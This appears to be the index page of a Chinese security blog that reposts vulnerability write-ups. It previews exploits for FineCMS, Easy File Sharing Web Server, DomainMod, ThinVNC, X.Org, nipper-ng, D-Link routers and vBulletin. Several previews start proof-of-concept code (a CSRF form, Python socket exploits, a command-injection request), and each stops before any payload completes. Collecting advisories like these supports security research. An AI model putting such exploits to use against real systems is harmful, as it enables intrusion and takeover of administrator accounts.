JoCat's blog

2021.1.17最近上传了部分自己用于学习的各种文章如有侵权请师傅们联系我进行删除，放在自己博客上只是为了查阅和分享~请联系JoCatWFY@163.com

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 Finecms_v5.4存在CSRF漏洞可修改管理员账户密码 2018-10-07 踏月留香 http://www.finecms.net/ http://down.chinaz.com/soft/32596.htm 5.4 CVE-2018-18191 漏洞概述 恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击，从而更改管理员账户密码。 POC实现代码如下： exp代码如下： <html> <body> <script>history.pushState('', '', '/')</script> <form act ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 0x01 前言就要被**，美其名曰：比我的web安全研究和代码审计更有前途。当然是选择原谅他啦。先审计finecms去去火，找到六处漏洞，先放两处容易被发现的getshell和对应的两个python脚本 0x02 getshell第一处getshell：在C:/phpStudy/WWW/finecms/dayrui/controllers/Api.php中的data2函数，大约在第115行，有问题的代码大约在178行 public function data2() { $data = array(); // 安全码认证 $auth = $this->input->get('auth', true); if ($auth != md5(SYS_KEY))  ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)POC# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow# Tested on: XP SP3 EN# category: Remote Exploit# Usage: ./exploit.py ip portimport socketimport syshost = str(sys.argv[1])port = int(sys.argv[2])a = socket.socket()print "Connecting to: " + host + ":" + str(port)a.connect((host ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 DomainMod的XSS 2018-05-24 longer/套哥（taoge@5ecurity.cn） https://github.com/domainmod/domainmod https://github.com/domainmod/domainmod 4.09.03/4.10.0 CVE-2018-11403/CVE-2018-11403/CVE-2018-11404/CVE-2018-11558/CVE-2018-11559 漏洞概述 DomainMod v4.09.03版本和v4.10.0 ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com ThinVNC 1.0b1 - Authentication Bypass简介ThinVNC是一款基于HTML5和AJAX的远程桌面实现 POC# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass# Date: 2019-10-17# Exploit Author: Nikhith Tumamlapalli# Contributor WarMarX# Vendor Homepage: https://sourceforge.net/projects/thinvnc/# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download# Version: 1.0b1# ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC0x1 简单介绍 X Server 是绝大对数Linux发行版和Unix系统的基础图形界面程序，是系统标配。而此程序也是以Root权限启动的，因而成功溢出它而获得的shell，也是root权限。 0x2 漏洞相关信息 # 时间: 2019-10-16 # 作者: Marcelo Vázquez (s4vitar) # 厂商: https://www.x.org/ # 版本: <= 1.20.4 # 测试平台: Linux # CVE: CVE-2019-17624 0x3 POC #!/usr/bin/python#codin ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com CVE-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC简介 Nipper是一个网络基础结构配置解析器，也是设备（防火墙，路由器以及网络基础设施）安全配置检查工具所以也是一种黑客工具，可也检查目标设备是否有脆弱性配置，它能检查并给出建议。 POC# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)# Date: 2019-10-20# Exploit Author: Guy Levin# https://blog.vastart.dev# Vendor Homepage: https://tools.kali.org/reporting-tools/n ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com D-Link路由器曝出RCE漏洞，牵涉多个型号简介 Fortinet旗下FortiGuard实验室的研究人员披露了D-Link路由器上的一个远程命令执行漏洞，牵涉多个型号 相关文章 https://www.fortinet.com/blog/threat-research/d-link-routers-found-vulnerable-rce.htmlhttps://nosec.org/home/detail/3020.html 根据作者披露的受影响型号为： DIR-655 DIR-866L DIR-652 DHP-1565 POC 如下 攻击者可以利用该漏洞将任意字符串发送到“PingTest”网关接口来实现命令注入。 POST /apply_sec.cgi HTTP/1.1Host: 192.168.232.128User-Ag ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 前言vBulletin 是一个商用的论坛程序，在全球拥有数万用户且增长速度很快。该论坛采用PHP Web语言及MySQL数据库的方式进行架构。《财富》 500强和Alexa排名前100万的公司网站大部分都在使用的一款互联网论坛程序。 漏洞简介CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit ，无需预认证即可执行远程代码执行漏洞 漏洞危害不需要在目标论坛上注册帐户,即可在运行vBulletin安装的服务器上执行shell命令 影响范围产品 vBulletin 5.x 版本 vBulletin v5（5.0.0到5.5.4）版本 组件 vBulletin 漏洞复现POC#!/usr/bin/python## vBulletin 5.x 0day pre-auth RCE exploit# # T ...